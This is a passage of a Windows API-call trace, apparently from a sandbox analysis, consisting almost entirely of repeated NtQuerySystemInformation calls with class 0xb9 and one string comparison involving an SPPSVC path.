SystemInformation=0xc751dfe480, Length=0x28, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x28, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x28, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x28, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x38, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x28, ResultLength=0x0) [0210.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x28, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe410, Length=0x20, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe390, Length=0x20, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe390, Length=0x20, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe390, Length=0x20, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x38, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x38, ResultLength=0x0) [0210.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x20, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x20, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x28, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0210.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x28, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9c0, Length=0x28, ResultLength=0x0) [0210.541] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x28, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x20, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x20, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x20, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x20, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9c0, Length=0x28, ResultLength=0x0) [0210.565] _wcsicmp 